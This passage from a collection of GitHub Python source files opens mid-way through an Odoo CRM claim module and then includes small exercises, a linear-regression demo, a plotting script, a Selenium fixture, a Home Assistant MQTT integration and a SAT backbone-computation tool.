Cost'),\n 'fixing_cost_desc': fields.text('Fixing Cost Description'),\n 'reso_actions': fields.selection((\n ('partial refund','Partial Refund'), \n ('full refund','Full Refund'), \n ('replacement','Replacement'), \n ('repair','Repair')),'Resolution actions'),\n# 'qc_manager': fields.function(\n# _qc_manager,\n# string='QC Manager',\n# type='char',\n# size=128,\n# ),\n 'warranty_id': fields.char('Warranty ID#', size=32),\n #Issue279\n 'product_purchase_ids':fields.many2many('product.product', 'claim_product_purchase','claim_id','product_id',string='Product Purchase'),\n 'department_ids': fields.many2many('hr.department', 'claim_department', 'claim_id', 'department_id', string='Root Responsible Department'), #Issue 287\n 'resp_ids': fields.many2many('hr.employee', 'claim_employee', 'claim_id', 'employee_id',string='Root Responsible Person'), #Issue 287\n 'pre_action': fields.text('Prevention Action'), #Issue287\n 'co_action': fields.text('Correction Action'), #Issue287\n 'if_final': fields.boolean('If Final Settled'),#Issue287\n 'youtube_url':fields.char('YouTube URL', size=128),#Issue321\n 'youtube_url_fd':fields.char('YouTube URL', size=128),#Issue321\n 'youtube_url_wc':fields.char('YouTube URL', size=128),#Issue321\n }\n\n #Issue340\n def name_get(self, cr, uid, ids, context=None):\n if context is None:\n context = {}\n if isinstance(ids, (int, long)):\n ids = [ids]\n res = []\n for record in self.browse(cr, uid, ids, context=context):\n name = str(record.number) + '-' + str(record.name)\n if record.sale_id:\n name += '-' + str(record.sale_id.name)\n if record.partner_id:\n name += '-' + str(record.partner_id.name)\n res.append((record.id, name))\n return res\n\n\n def write(self, cr, uid, ids, vals, context=None):\n #Issue 287\n if ('department_ids' in vals or 'resp_ids' in vals) and not self.pool.get('ir.model.access').check_groups(cr, uid, \"base.group_sale_manager\"):\n raise osv.except_osv(_('Error!'), _('The Root Responsible Person and Root Responsible Department must be modified by Sales Manager!'))\n\n for claim in self.browse(cr, uid, ids, context=context):\n users = []\n new_em_emails = []\n if 'resp_ids' in vals:\n old = claim.resp_ids and [d.id for d in claim.resp_ids] or []\n new = vals.get('resp_ids') and vals.get('resp_ids')[0][-1] or []\n for employee in new:\n em = self.pool.get('hr.employee').browse(cr, uid, employee)\n if em.user_id:\n users.append(em.user_id.id)\n ans = set(new) - set(old)\n for employee in ans:\n em = self.pool.get('hr.employee').browse(cr, uid, employee)\n if em.work_email:\n 
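The `write` override in this record emails only the employees newly attached to `resp_ids`, which reduces to a set difference between the old and new id lists. That core step, isolated:

```python
def newly_added(old_ids, new_ids):
    """Ids present after the write but not before: the people to notify."""
    return sorted(set(new_ids) - set(old_ids))

print(newly_added([7, 9], [7, 9, 12, 15]))  # [12, 15]
```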
new_em_emails.append(str(em.work_email))\n else:\n for em in claim.resp_ids:\n if em.user_id:\n users.append(em.user_id.id)\n #_logger.info('vals ---- %s users %s new_em_emails %s',vals,users,new_em_emails)\n\n if ((users and uid not in users) and (not self.pool.get('ir.model.access').check_groups(cr, uid, \"base.group_sale_manager\"))) and ('department_ids' in vals or 'resp_ids' in vals or 'cause' in vals):\n raise osv.except_osv(_('Error!'), _('The Root must be modified by Root Responsible Person or Sales Manager!'))\n # The sale manager can modify department_ids,resp_ids.\n if new_em_emails:\n try:\n ir_model_data = self.pool.get('ir.model.data')\n template_id = ir_model_data.get_object_reference(cr, uid, 'crm_claim_enhance', 'email_template_crm_claim_responsible')[1]\n if template_id:\n template_obj = self.pool.get('email.template')\n template_obj.write(cr, uid, [template_id], {'email_to': ','.join(new_em_emails)})\n template_obj.send_mail(cr, uid, template_id, claim.id, True)\n except ValueError:\n template_id = False\n\n return super(crm_claim, self).write(cr, uid, ids, vals, context=context)\n\n\n #Issue 286\n def action_create_refund_invoice(self, cr, uid, ids, context=None):\n dummy, view_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'account_enhance', 'invoice_form_inh_cus')\n claim_obj = self.browse(cr, uid, ids[0])\n return {\n 'name': \"Create\",\n 'view_mode': 'form',\n 'view_id': view_id,\n #'res_id': order_id,\n 'view_type': 'form',\n 'res_model': 'account.invoice',\n 'type': 'ir.actions.act_window',\n 'nodestroy': True,\n #'target': 'new',\n 'domain': '[]',\n 'context': {\n \"default_type\": \"out_refund\",\n \"journal_type\": \"sale_refund\",\n \"claim_id\": ids and ids[0],\n \"partner_id\": claim_obj.partner_id.id,\n \"origin\": claim_obj.number +'+' + claim_obj.sale_id.name,\n \"name\": claim_obj.number +'+' + claim_obj.sale_id.name,\n },\n }\n\n def action_create_order(self, cr, uid, ids, context=None):\n sale_obj = self.pool.get(\"sale.order\")\n line_obj = self.pool.get(\"sale.order.line\")\n dummy, view_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'sale', 'view_order_form')\n for claim in self.browse(cr ,uid, ids, context=context):\n so_name = self.pool.get('ir.sequence').get(cr, uid, 'sale.order', context=context)\n order_id = sale_obj.create(cr ,uid, {\n 'name': so_name,\n 'partner_id': claim.partner_id.id,\n 'origin': claim.name,\n 'partner_invoice_id': claim.partner_id.id,\n 'partner_shipping_id': claim.partner_id.id,\n 'pricelist_id': claim.partner_id.property_product_pricelist and claim.partner_id.property_product_pricelist.id or False\n }, context=context)\n for product_id in claim.parts_code:\n line_vals = {\n 'order_id': order_id,\n 'name': product_id.name,\n 'product_id': product_id.id,\n 'price_unit': product_id.list_price,\n 'product_uom_qty': 1,\n 'product_uom': product_id.uom_id.id,\n }\n line_obj.create(cr, uid, line_vals, context=context)\n #return osv.except_osv(_('Info!'), _('%s created successfully!'%so_name))\n return {\n 'name': \"Create Success\",\n 'view_mode': 'form',\n 'view_id': view_id,\n 'res_id': order_id,\n 'view_type': 'form',\n 'res_model': 'sale.order',\n 'type': 'ir.actions.act_window',\n 'nodestroy': True,\n #'target': 'new',\n 'domain': '[]',\n 'context': {},\n }\n\n\n #Issue 287\n def case_close(self, cr, uid, ids, context=None):\n result = super(crm_claim, self).case_close(cr, uid, ids, context)\n for claim in self.browse(cr ,uid, ids, context=context):\n if not claim.co_action:\n raise 
osv.except_osv(_('Missing Data'),_('Please Fill Customer Service Resolutions'))\n\n #CRM - Channel OP Team\n crm = []\n for em in self.pool.get('res.users').browse(cr, uid, uid).employee_ids:\n if em.department_id.id == 16 or (em.department_id.name and em.department_id.name.upper().startswith('CRM')):\n crm.append(em.user_id.id)\n\n if uid != claim.user_id.id and not self.pool.get('ir.model.access').check_groups(cr, uid, \"base.group_sale_manager\") and uid not in crm:\n raise osv.except_osv(_('Error!'), _('This claim must be comfired by Responsible or Sale Manager or Employee(CRM - Channel OP Team)!'))\n #raise osv.except_osv(_('Error!'), _('This claim must be comfired by QC manager!'))\n #Final Settle\n if claim.if_final:\n self.write(cr, uid, [claim.id], {'stage_id':12})\n return result\n\n #Issue287\n def case_close_final(self, cr, uid, ids, context=None):\n for claim in self.browse(cr ,uid, ids, context=context):\n if not claim.department_ids or not claim.resp_ids or not claim.cause:\n raise osv.except_osv(_('Error!'), _('The Root Responsible Department and Root Responsible Person and Root Causes can not be NULL!'))\n users = []\n for em in claim.resp_ids:\n if em.user_id:\n users.append(em.user_id.id)\n if (users and uid not in users) and not self.pool.get('ir.model.access').check_groups(cr, uid, \"base.group_sale_manager\"):\n raise osv.except_osv(_('Error!'), _('This claim must be comfired by Responsible or Sale Manager!'))\n self.write(cr, uid, [claim.id], {'if_final':True})\n #Final Settle\n if claim.state == 'done':\n self.write(cr, uid, [claim.id], {'stage_id':12})\n return True\n\n '''\n def action_comfirm_byqc(self, cr, uid, ids, context=None):\n context = context or {}\n for claim in self.browse(cr ,uid, ids, context=context):\n if claim.qc_manager and str(uid) not in claim.qc_manager:\n raise osv.except_osv(_('Error!'), _('You have not right to confirm this claim!'))\n else:\n context.update({\"force_close\":True})\n return self.case_close(cr, uid, [claim.id], context=context)\n return\n '''\n\n #Issue328\n def create(self, cr, uid, vals, context=None):\n res = super(crm_claim, self).create(cr, uid, vals, context=context)\n claim = self.browse(cr, uid, res)\n email_to = list(set([product.supplier_resp and product.supplier_resp.email for product in claim.product_purchase_ids] + [product.qc_manager and product.qc_manager.partner_id.email for product in claim.product_purchase_ids]))#Issue356 \n email_to = list(set(filter(lambda x: x,email_to)))\n \n if email_to:\n template = self.pool.get('ir.model.data').get_object(cr, uid, 'crm_claim_mactrends', 'email_template_claim')\n template_obj = self.pool.get('email.template')\n old_email_to = template_obj.browse(cr, uid, template.id).email_to\n template_obj.write(cr, uid, [template.id], {'email_to':','.join(email_to)})\n mail_id = template_obj.send_mail(cr, uid, template.id, claim.id, True)\n if old_email_to:\n template_obj.write(cr, uid, [template.id], {'email_to':old_email_to})\n return res\n\n #Issue349\n def action_create_refund_picking(self, cr, uid, ids, context=None):\n cr.execute(\"select id from stock_picking where sale_id in (select sale_id from crm_claim where id= %s) and type='in'\"%ids[0])\n pickings = cr.fetchall()\n #_logger.info('pp------ %s',pickings)\n if pickings:\n dummy, view_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'stock_enhance', 'view_picking_in_form_inh')\n result = {\n 'name': \"Exist!\",\n 'view_mode': 'form',\n 'view_id': view_id,\n 'view_type': 'form',\n 'res_model': 
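`case_close_final` above refuses to run unless department, responsible person, and root cause are all set, raising on the first gap. A generic sketch of that guard which reports every missing field at once (a plain dict stands in for the ORM record):

```python
def check_required(record, fields):
    missing = [f for f in fields if not record.get(f)]
    if missing:
        raise ValueError("missing required fields: " + ", ".join(missing))

claim = {"cause": "loose fitting", "department_ids": [3], "resp_ids": []}
try:
    check_required(claim, ["department_ids", "resp_ids", "cause"])
except ValueError as err:
    print(err)  # missing required fields: resp_ids
```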
'stock.picking.in',\n 'res_id': pickings[0][0],\n 'type': 'ir.actions.act_window',\n 'nodestroy': True,\n 'domain': '[]',\n 'context': {\n \"type\": \"in\",\n \"claim_id\": ids and ids[0]\n }}\n return result\n\n cr.execute(\"select id from stock_picking where sale_id in (select sale_id from crm_claim where id= %s) and type='out'\"%ids[0])\n pickings = cr.fetchall()\n if pickings:\n dummy, view_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'stock', 'view_stock_return_picking_form')\n result = {\n 'name': \"Create\",\n 'view_mode': 'form',\n 'view_id': view_id,\n 'view_type': 'form',\n 'res_model': 'stock.return.picking',\n 'type': 'ir.actions.act_window',\n 'nodestroy': True,\n 'target': \"new\",\n 'domain': '[]',\n 'context': {\n \"type\": \"in\",\n \"active_id\":pickings[0][0],\n \"claim_id\": ids and ids[0]\n },}\n return result\n\ncrm_claim()\n","repo_name":"haitunzzz/ODOO","sub_path":"crm_claim_enhance/crm_claim.py","file_name":"crm_claim.py","file_ext":"py","file_size_in_byte":15525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14944557253","text":"def handle_list_of_tuples(tuples_list):\n \"\"\"The function that takes list of tuples and sort it\n based on the 'name/age/height/weight' rule.\n Also we need to sort height in reverse order.\n :param tuples_list: list of tuples\n :return: sorted list of tuples by required rule\n \"\"\"\n return sorted(tuples_list, key=lambda item: (\n item[0],\n item[1],\n -int(item[2]), # Here, our goal is to reverse sort by height\n item[3]\n ))\n\n\ndef main():\n items_list = [\n (\"Tom\", \"19\", \"167\", \"54\"),\n (\"Jony\", \"24\", \"180\", \"69\"),\n (\"Json\", \"21\", \"185\", \"75\"),\n (\"John\", \"27\", \"190\", \"87\"),\n (\"Jony\", \"24\", \"191\", \"98\"),\n ]\n print(handle_list_of_tuples(items_list))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"YuriiKhomych/db2-python-django","sub_path":"tasks/3_handle_list_of_tuples.py","file_name":"3_handle_list_of_tuples.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22862012686","text":"import numpy as np \nimport matplotlib.pyplot as plt \n\n# Data set\nA = [2,5,7,9,11,16,19,23,22,29,29,35,37,40,46]\nb = [2,3,4,5,6,7,8,9,10,11,12,13,14,15,16]\nplt.plot(A,b,'ro')\n\n# Convert row vector to column vector\nA = np.array([A]).T\nb = np.array([b]).T\n\n# Create ones vector\nones = np.ones((A.shape[0], 1), dtype=np.int8)\n\n# Concatenate ones to A\nA = np.concatenate((A,ones), axis=1)\n\n# Apply linear regression formula\nresult = np.linalg.inv(A.T.dot(A)).dot(A.T.dot(b))\n\n# Visualize result\nx0 = np.array([1,50]).T\ny0 = result[0][0] * x0 + result[1][0]\nplt.plot(x0,y0)\n\nplt.show()\n","repo_name":"nguyengiahy/Machine-Learning-Algorithms-Visualizer","sub_path":"Linear-Regression-Visualizer/linearRegression.py","file_name":"linearRegression.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18390947550","text":"from figures import *\nfrom defaults import*\n\nwidth = standardwidth\nheight = standardheight\nbeginfigure(\"1_5_PPprimeplot\", 2*width, height)\n\nsave()\nmargin = 10\nsetupcoordinates([margin,margin,width-2*margin,height-2*margin], \n [-10, -50, 90, 450])\n\nxrange = [-10, 10, 90]\nyrange = [-50, 50, 450]\n\ngrid = Grid(xrange, yrange, color = 
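The linear-regression record solves the normal equations with an explicit matrix inverse. `np.linalg.lstsq` fits the same line but is numerically safer when AᵀA is ill-conditioned; a sketch on the record's own data:

```python
import numpy as np

A = np.array([2, 5, 7, 9, 11, 16, 19, 23, 22, 29, 29, 35, 37, 40, 46], dtype=float)
b = np.arange(2, 17, dtype=float)  # 2..16, as in the record

X = np.column_stack([A, np.ones_like(A)])  # [x, 1] design matrix
(slope, intercept), *_ = np.linalg.lstsq(X, b, rcond=None)
print(slope, intercept)
```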
gridcolor)\ngrid.setlinewidth(gridwidth)\ngrid.draw()\n\naxes = Axes()\naxes.draw()\n\naxes.setticks(xrange, yrange)\naxes.drawticks()\n\naxes.sethticksize(sizeofaxesticks)\naxes.setvticksize(sizeofaxesticks)\n\naxes.setlabels([0,20,80],[0,100,400])\naxes.sethlabelscale(scaleofaxeslabels)\naxes.setvlabelscale(scaleofaxeslabels)\naxes.drawlabels()\n\nlabel = Label(r\"$y = P(t)$\", [10,350], alignment = \"lt\", offset = [0, -2] )\nlabel.draw()\n\nlabel = Label(r\"$^\\circ$F\", [5,410], alignment = \"lb\", offset = [2, 2] )\nlabel.draw()\n\nlabel = Label(r\"min\", [80,20], alignment = \"lb\", offset = [2, 2] )\nlabel.draw()\n\n\n############# original function graph\n\ndef f(x):\n return 400-330*math.exp(-0.03*x)\n\ncliptoboundingbox() \ngraph = Graph(Function(f))\ngraph.setcolor(graphcolor)\ngraph.setdomain([0,90])\ngraph.setlinewidth(graphwidth)\ngraph.draw()\n\nrestore()\n\n############## now the derivative function graph\n\nsave()\nmargin = 10\n\nsetupcoordinates([width+2*margin,margin,2*width-2*margin,height-2*margin], \n [-10, -2, 90, 18])\n\nxrange = [-10, 10, 90]\nyrange = [-2, 2, 18]\n\ngrid = Grid(xrange, yrange, color = gridcolor)\ngrid.setlinewidth(gridwidth)\ngrid.draw()\n\naxes = Axes()\naxes.draw()\n\naxes.setticks(xrange, yrange)\naxes.drawticks()\n\naxes.sethticksize(sizeofaxesticks)\naxes.setvticksize(sizeofaxesticks)\n\naxes.setlabels([0,20,80], [0,4,16])\naxes.sethlabelscale(scaleofaxeslabels)\naxes.setvlabelscale(scaleofaxeslabels)\naxes.drawlabels()\n\nlabel = Label(r\"$y = P'(t)$\", [10,10], alignment = \"lt\", offset = [2, -2] )\nlabel.draw()\n\nlabel = Label(r\"$^\\circ$F/min\", [5,16], alignment = \"lb\", offset = [2, 2] )\nlabel.draw()\n\nlabel = Label(r\"min\", [80,1], alignment = \"lb\", offset = [2, 2] )\nlabel.draw()\n\ndef f(x):\n return 400-330*math.exp(-0.03*x)\n\nderivative = Function(f).differentiate()\ngraph = Graph(derivative, color=darkgreen)\ngraph.setdomain([0,90])\ngraph.draw()\n\nrestore()\n\nendfigure()\n","repo_name":"ArmstrongCal/Armstrong-Calculus","sub_path":"figures/1_5_PPprimeplot.py","file_name":"1_5_PPprimeplot.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"2706098239","text":"import platform\nimport os\nimport pytest\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\n\n\nclass DriverSetup:\n\n @pytest.yield_fixture(autouse=True)\n def init_browser(self):\n options = webdriver.ChromeOptions()\n options.add_argument('--ignore-certificate-errors')\n options.add_argument('--ignore-ssl-errors')\n options.add_argument('start-maximized')\n if platform.system() == \"Darwin\":\n dir_path = os.path.dirname(os.path.realpath(__file__))\n chromedriver = dir_path + \"/webdrivers/chromedriver\"\n os.environ[\"webdriver.chrome.driver\"] = chromedriver\n self.driver = webdriver.Chrome(options=options, executable_path=chromedriver)\n else:\n self.driver = webdriver.Chrome(options=options, executable_path=ChromeDriverManager().install())\n self.driver.implicitly_wait(10)\n yield\n if (self.driver != None):\n self.driver.close()\n self.driver.quit()\n","repo_name":"eschelkunov/AQA_Python","sub_path":"ui/DriverSetup.py","file_name":"DriverSetup.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11482053813","text":"# 在这里写上你的代码 :-)\n'''\n题目078:找到年龄最大的人,并输出。\nperson = 
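The derivative curve in the figures record comes from the custom `Function(f).differentiate()`; when no such helper is available, a central finite difference is the usual numeric stand-in (the step size here is chosen ad hoc):

```python
import math

def differentiate(f, h=1e-6):
    """Numeric derivative via the central difference (f(x+h) - f(x-h)) / 2h."""
    return lambda x: (f(x + h) - f(x - h)) / (2 * h)

f = lambda t: 400 - 330 * math.exp(-0.03 * t)
fprime = differentiate(f)
print(round(fprime(0), 3))  # 9.9, i.e. 330 * 0.03, matching the P'(t) plot
```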
{\"li\":18,\"wang\":50,\"zhang\":20,\"sun\":22}\n'''\ndef tm078():\n '''\n 【个人备注】:官网的答案也基本一样。\n '''\n person = {\"li\":18,\"wang\":50,\"zhang\":20,\"sun\":22}\n name,age='',0\n for p in person.keys():\n if person.get(p)>age:\n name,age=p,person.get(p)\n print(name,age)\n\ntm078()\n","repo_name":"xiang-daode/Python3_codes","sub_path":"T078_字典中找到年龄最大的人.py","file_name":"T078_字典中找到年龄最大的人.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17149846111","text":"\"\"\"Sleep As Android integration\"\"\"\n\nimport logging\nfrom typing import Dict, Callable\n\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.helpers import entity_registry as er\nfrom homeassistant.core import HomeAssistant, callback\nfrom homeassistant.components.mqtt import subscription\nfrom homeassistant.exceptions import NoEntitySpecifiedError\n\nfrom .const import DOMAIN, DEVICE_MACRO\nfrom .sensor import SleepAsAndroidSensor\n\n_LOGGER = logging.getLogger(__name__)\n\n\nasync def async_setup(_hass: HomeAssistant, _config_entry: ConfigEntry):\n return True\n\n\nasync def async_setup_entry(hass: HomeAssistant, config_entry: ConfigEntry):\n _LOGGER.info(\"Setting up %s \", config_entry.entry_id)\n\n if DOMAIN not in hass.data:\n hass.data[DOMAIN] = {}\n\n registry = await er.async_get_registry(hass)\n hass.data[DOMAIN][config_entry.entry_id] = SleepAsAndroidInstance(hass, config_entry, registry)\n return True\n\n\nclass SleepAsAndroidInstance:\n def __init__(self, hass: HomeAssistant, config_entry: ConfigEntry, registry: er):\n self.hass = hass\n self._config_entry = config_entry\n self.__sensors: Dict[str, SleepAsAndroidSensor] = {}\n self._entity_registry: er = registry\n self._subscription_state = None\n\n try:\n self._name: str = self.get_from_config('name')\n except KeyError:\n self._name = 'SleepAsAndroid'\n\n # will call async_setup_entry from sensor.py\n self.hass.loop.create_task(self.hass.config_entries.async_forward_entry_setup(self._config_entry, 'sensor'))\n # ToDo prepare topic_template and other variables that should be defined one time.\n\n @property\n def device_position_in_topic(self) -> int:\n \"\"\" Position of DEVICE_MACRO in configured MQTT topic \"\"\"\n result: int = 0\n\n for p in self.configured_topic.split('/'):\n if p == DEVICE_MACRO:\n break\n else:\n result += 1\n\n return result\n\n @staticmethod\n def device_name_from_topic_and_position(topic: str, position: int) -> str:\n \"\"\"\n Get device name from full topic.\n :param topic: full topic from MQTT message\n :param position: position of device template\n\n :returns: device name\n \"\"\"\n result: str = \"unknown_device\"\n s = topic.split('/')\n if position >= len(s):\n # If we have no DEVICE_MACRO in configured_topic,\n # then device_position_in_topic is greater than topic length and we should use\n # last segment of topic as device name\n position = len(s) - 1\n\n return s[position]\n\n def device_name_from_topic(self, topic: str) -> str:\n \"\"\"Get device name from topic\n\n :param topic: topic sting from MQTT message\n :returns: device name\n \"\"\"\n return self.device_name_from_topic_and_position(topic, self.device_position_in_topic)\n\n @property\n def topic_template(self) -> str:\n \"\"\"\n Converts topic with {device} to MQTT topic for subscribing\n \"\"\"\n splitted = self.configured_topic.split('/')\n try:\n splitted[self.device_position_in_topic] = '+'\n except IndexError:\n # If we have no DEVICE_MACRO in 
configured_topic,\n # then device_position_in_topic is greater than topic length\n pass\n return '/'.join(splitted)\n\n def get_from_config(self, name: str) -> str:\n try:\n data = self._config_entry.options[name]\n except KeyError:\n data = self._config_entry.data[name]\n\n return data\n\n @property\n def name(self) -> str:\n \"\"\"Name of the integration in Home Assistant.\"\"\"\n return self._name\n\n @property\n def configured_topic(self) -> str:\n \"\"\"MQTT topic from integration configuration.\"\"\"\n _topic = None\n\n try:\n _topic = self.get_from_config('topic_template')\n except KeyError:\n _topic = 'SleepAsAndroid/' + DEVICE_MACRO\n _LOGGER.warning(\"Could not find topic_template in configuration. Will use %s instead\", _topic)\n\n return _topic\n\n def create_entity_id(self, device_name: str) -> str:\n \"\"\"\n Generates entity_id based on instance name and device name.\n Used to identify individual sensors.\n\n :param device_name: name of device\n :returns: id that may be used for searching sensor by entity_id in entity_registry\n \"\"\"\n _LOGGER.debug(f\"create_entity_id: my name is {self.name}, device name is {device_name}\")\n return self.name + \"_\" + device_name\n\n def device_name_from_entity_id(self, entity_id: str) -> str:\n \"\"\"\n Extract device name from entity_id\n\n :param entity_id: entity id that was generated by self.create_entity_id\n :returns: pure device name\n \"\"\"\n _LOGGER.debug(f\"device_name_from_entity_id: entity_id='{entity_id}'\")\n return entity_id.replace(self.name + \"_\", \"\", 1)\n\n @property\n def entity_registry(self) -> er:\n return self._entity_registry\n\n async def subscribe_root_topic(self, async_add_entities: Callable):\n \"\"\"(Re)Subscribe to topics.\"\"\"\n _LOGGER.debug(\"Subscribing to '%s' (generated from '%s')\", self.topic_template, self.configured_topic)\n self._subscription_state = None\n\n @callback\n def message_received(msg):\n \"\"\"Handle new MQTT messages.\"\"\"\n\n _LOGGER.debug(\"Got message %s\", msg)\n device_name = self.device_name_from_topic(msg.topic)\n entity_id = self.create_entity_id(device_name)\n _LOGGER.debug(f\"sensor entity_id is {entity_id}\")\n\n (target_sensor, is_new) = self.get_sensor(device_name)\n if is_new:\n async_add_entities([target_sensor], True)\n try:\n target_sensor.process_message(msg)\n except NoEntitySpecifiedError:\n # ToDo: async_write_ha_state() runs before async_add_entities, so entity have no entity_id yet\n pass\n\n self._subscription_state = await subscription.async_subscribe_topics(\n self.hass,\n self._subscription_state,\n {\n \"state_topic\": {\n \"topic\": self.topic_template,\n \"msg_callback\": message_received,\n \"qos\": self._config_entry.data['qos']\n }\n }\n )\n if self._subscription_state is not None:\n _LOGGER.debug(\"Subscribing to root topic is done!\")\n else:\n _LOGGER.critical(f\"Could not subscribe to topic {self.topic_template}\")\n\n def get_sensor(self, sensor_name: str) -> (SleepAsAndroidSensor, bool):\n \"\"\"\n Get sensor by it's name. If we have no such key in __sensors -- create new sensor\n :param sensor_name: name of sensor\n :return: (sensor with name \"sensor_name\", it it a new sensor)\n\n \"\"\"\n try:\n return self.__sensors[sensor_name], False\n except KeyError:\n _LOGGER.info(\"New device! 
Let's create sensor for %s\", sensor_name)\n new_sensor = SleepAsAndroidSensor(self.hass, self._config_entry, sensor_name)\n self.__sensors[sensor_name] = new_sensor\n return new_sensor, True\n","repo_name":"jabastien/Home-AssistantConfig","sub_path":"custom_components/sleep_as_android/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71246330728","text":"# computes the backbone of a DIMACS file (+ and - mark core and dead variables, respectively)\n# (C) 2020 Jaroslav Šafář (https://github.com/jaras209/SAT_solver/blob/master/backbones.py)\n# (C) 2023 Elias Kuiter\n# adapted to rely on the performant SAT solver kissat_MAB-HyWalk (winner of the SAT Competition 2022)\n# added several performance optimizations for analyzing large formulas\n# also added functionality to remove backbone from DIMACS\n# could be replaced with https://github.com/arminbiere/cadiback, which is more efficient\n\nimport sys\nimport heapq\nimport subprocess\nimport shutil\nimport os\nimport tempfile\nimport argparse\nimport itertools\n\nworking_directory = '/'.join(sys.argv[0].split('/')[:-1])\n\ndef flatten(iterable):\n iterator = iter(iterable)\n try:\n while 1:\n item = next(iterator)\n if not hasattr(item,'__trunc__'):\n iterator = itertools.chain(iter(item), iterator)\n else:\n yield item\n except StopIteration:\n pass\n\ndef read_variable_map(file, by_name=False):\n f = open(file, mode=\"r\")\n dimacs_formula = f.read()\n dimacs_formula = dimacs_formula.splitlines()\n variable_map = {}\n for s in dimacs_formula:\n if s.startswith('c '):\n parts = s[2:].strip().split()\n if by_name:\n variable_map[parts[1]] = int(parts[0])\n else:\n variable_map[int(parts[0])] = parts[1]\n f.close()\n return variable_map\n\ndef read_dimacs(file):\n global variables\n f = open(file, mode=\"r\")\n dimacs_formula = f.read()\n dimacs_formula = dimacs_formula.splitlines()\n formula = [list(map(int, clause[:-2].strip().split())) for clause in dimacs_formula if clause != \"\" and\n clause[0] not in [\"c\", \"p\", \"%\", \"0\"]]\n variables = [(s.split()[2]) for s in dimacs_formula if s.startswith('p ')][0]\n f.close()\n return formula\n\ndef write_dimacs(file, formula, variable_map=None):\n global variables\n f = open(file, \"w+\")\n if variable_map:\n for index, variable in variable_map.items():\n f.write(f'c {index} {variable}\\n')\n f.write(f'p cnf {variables} {len(formula)}\\n')\n for c in formula:\n f.write(' '.join(map(str, c)) + ' 0\\n')\n f.close()\n\ndef append_dimacs(from_file, to_file, literal):\n global variables\n from_file = open(from_file, mode=\"r\")\n to_file = open(to_file, mode=\"w+\")\n literals = int(from_file.readline().split()[3])\n to_file.write(f'p cnf {variables} {literals + 1}\\n')\n shutil.copyfileobj(from_file, to_file)\n to_file.write(f'{literal} 0\\n')\n from_file.close()\n to_file.close()\n\ndef shell(command):\n return subprocess.run(command, capture_output=True, text=True).stdout.split('\\n')\n\ndef kissat(file):\n model = list(flatten([list(map(int, s[2:].strip().split())) for s in shell([f'{working_directory}/kissat_MAB-HyWalk', file]) if s.startswith('v ')]))\n return len(model) > 0, model\n\ndef delete(file):\n os.remove(file) if os.path.exists(file) else None\n\ndef find_backbone(file):\n with tempfile.TemporaryDirectory() as temp_directory:\n def temp_file(file):\n return f'{temp_directory}/{file}.dimacs'\n formula_file = temp_file('formula')\n assumed_file = 
temp_file('assumed')\n inferred_file = temp_file('inferred')\n \n formula = read_dimacs(file)\n write_dimacs(formula_file, formula)\n sat, model = kissat(formula_file)\n if not sat:\n return None, None\n\n occurrences = {}\n for clause in formula:\n for literal in clause:\n occurrences.setdefault(literal, 0)\n occurrences[literal] += 1\n\n def compare(self, a, b):\n return a[0] < b[0]\n heapq.cmp_lt=compare\n candidates = []\n for literal in model:\n heapq.heappush(candidates, [-occurrences.get(literal, 0), literal])\n\n backbone = []\n while candidates:\n _, literal = heapq.heappop(candidates)\n if literal == 0:\n continue\n append_dimacs(formula_file, assumed_file, -literal)\n sat, model = kissat(assumed_file)\n if not sat:\n backbone.append(literal)\n append_dimacs(formula_file, inferred_file, literal)\n os.rename(inferred_file, formula_file)\n else:\n temp = set(model)\n for c in candidates:\n if c[1] not in temp:\n c[1] = 0\n\n delete(formula_file)\n delete(assumed_file)\n delete(inferred_file)\n return backbone, formula\n\ndef clean_backbone(backbone, formula):\n backbone = set(backbone)\n new_formula = []\n \n for literal in backbone:\n new_formula.append([literal])\n\n for clause in formula:\n done = False\n for literal in backbone:\n if literal in clause:\n done = True\n break\n if done:\n continue\n new_clause = []\n for literal in clause:\n if -literal in backbone:\n continue\n new_clause.append(literal)\n new_formula.append(new_clause)\n\n return new_formula\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Computes and removes backbones.')\n parser.add_argument('--input', help='DIMACS input file', required=True)\n parser.add_argument('--backbone', help='backbone output file')\n parser.add_argument('--output', help='DIMACS output file')\n args = parser.parse_args()\n\n backbone, formula = find_backbone(args.input)\n variable_map = read_variable_map(args.input)\n\n if backbone:\n if args.backbone:\n readable_backbone = [('+' if l > 0 else '-') + (variable_map[abs(l)] if abs(l) in variable_map else str(abs(l))) for l in backbone]\n f = open(args.backbone, mode=\"w+\")\n for literal in readable_backbone:\n f.write(literal + '\\n')\n f.close()\n\n if args.output:\n new_formula = clean_backbone(backbone, formula)\n write_dimacs(args.output, new_formula, variable_map)\n \n else:\n print('formula unsatisfiable')","repo_name":"ekuiter/torte","sub_path":"docker/solver/other/backbone_kissat.py","file_name":"backbone_kissat.py","file_ext":"py","file_size_in_byte":6248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20478753429","text":"import re\nimport json\nimport os\nfrom pprint import pprint\nimport svgwrite\nimport networkx as nx\nfrom matplotlib import pyplot as plt\nimport time\n\ntestdict = {'p':{\n 'a': {\n 'aa': {},\n 'ab': {\n 'aba': {},\n 